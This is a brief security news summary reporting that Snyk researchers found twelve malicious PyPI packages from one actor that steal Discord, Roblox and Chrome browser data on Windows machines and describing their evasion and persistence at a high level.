Snyk security researchers have identified 12 unique pieces of malware, all belonging to the same actor, that were found in PyPi packages. These malicious packages steal Discord and Roblox credential and payment information by executing malicious executable files downloaded from the Discord content delivery network (CDN) onto Windows machines. The malware targets data stored for everyday user applications, including Google Chrome passwords, cookies, web history, search history, and bookmarks. It also injects a persistent malicious agent into the Discord app to relay alarming amounts of information to attackers. Additionally, it steals Roblox cookies and user data by executing executable files downloaded from the Roblox CDN onto Windows machines. The malware uses PyInstaller to bundle its application and dependencies into one package, attempting to avoid detection by bundling in dependencies instead of downloading them from a remote server. Snyk's security researchers continually monitor open source ecosystems for malicious packages using static analysis techniques to identify and flag suspicious packages.